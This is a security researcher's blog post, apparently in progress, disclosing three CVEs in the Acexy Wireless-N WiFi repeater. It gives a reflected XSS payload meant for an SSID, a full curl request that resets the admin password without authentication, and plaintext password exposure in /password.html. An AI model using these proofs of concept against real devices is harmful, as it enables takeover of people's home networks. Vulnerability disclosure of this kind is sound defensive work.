Acexy Wireless-N WiFi Repeater Vulnerabilities

Security analysis of some low-cost WiFi Repeaters

[As you may have noticed this blog post is in progress and it’s been made public primarly to make the CVEs details public. Naturally, each vulnerability description has to be considered “as it is” and won’t be modified once the story will be finished]

IoT devices are spreading fast nowadays and sometimes low-cost and poorly configured ones might severly harm the security and privacy of your home network, including the devices connected to it.

The problem is exarcebated by the huge amount of vendors selling these devices at quite low prices, which render them the most attractive choice for majority of the people. However, what most people should understand is that their low-cost devices might lead to… well.. other kind of costs!
These can be, of course, higher than what you would have spent by choosing a different WiFi Repeater.

Why these devices?

  • They are not too expensive (about 15€)
  • They are among the very first results provided by Amazon when you search for keywords like “WiFi Repeater/Extender”.

    Additionally, the second device is considered an Amazon’s Choice.
  • ..

The following sections summarize the vulnerabilities I found as a result of my analysis. The next secion will briefly discuss, for each device analysed, the vulnerabilities with an assigned CVE ID I’ve been able to found as well as other minor security-related issues affecting the involved devices.

To fix such vulnerabilities you should update your device’s firmware to the latest available version but sometimes, with really bad firmwares (or bugs?!), you won’t even be allowed to download software updates and this leaves you with only two choices: either you stay vulnerable or you replace the device at all.

Device (1/3): Acexy Wireless-N WiFi Repeater REV 1.0
Firmware: 28.08.06.1

CVE-2021–28160 — SSID Reflected XSS

As with every WiFi Repeater, you have to choose the wireless network which range you wish to extend, providing the password (if any) of its wireless AP.

The page shown above, “/repeater.html”, allows to select the network and displays the available wireless APs without applying any kind of sanitization on the data that is added to the HTML document, which is rendered by the browser.

Therefore, by modifying the SSID of a wireless network such as the following you can achieve JavaScript code executed every time a user visit the page repeater.html or, more in general, when a user just click on the “Repeater Wizard” section on the homepage.

<img src=no onerror=alert(1) foo

CVE-2021–28936— Improper Access Control on password reset requests

An Improper Access Control (CWE-284) vulnerability allows any device to change the Web management interface password by sending just one specially crafted HTTP GET request, without requiring any previous authentication.

In order to exploit the vulnerability you need to know the current management interface account name (by default, it is admin).
The following curl command change the management interface password to “mystrongpass123”, assuming the account name is admin and the IP address of the device is the default one (192.168.10.1).

curl -i -s -o /dev/null -w "%{http_code}" -k -X $'GET' \
-H $'Host: 192.168.10.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://192.168.10.1/password.html' -H $'Content-Length: 4' \
--data-binary $'\x0d\x0a\x0d\x0a' \
$'http://192.168.10.1/login.htm?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=admin&SET2=16843264=mystrongpass123&rd=0.7548039925199851&_=1615725324336'

Once the script finished its job just try to login with the password you provided.

CVE-2021–28937— Plaintext password reflected in /password.html HTML page

The web management interface password is included in the /password.html HTML page, which contains a form for changing the username or the password.

To test this vulnerability just visit the URL http://192.168.10.1/password.html and inspect the returned HTML element with any browser you prefer.

This kind of password disclosure also implies the device stores the password as a plaintext, without computing any hash value.

Others

  • HTTPS is never used and HTTP traffic can be easily intercepted on a LAN.

Username and password are sent unencrypted during authentication and, additionally, every time you visit /password.html you give to a potential attacker the chance to read your current username and password (both included in the HTML document).

  • Telnet service listening on port 23.

The default username is easy to guess (admin) but the password is not among the most trivial or common ones. I didn’t manage to guess the password though you might be luckier or just better than me at generating password lists.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store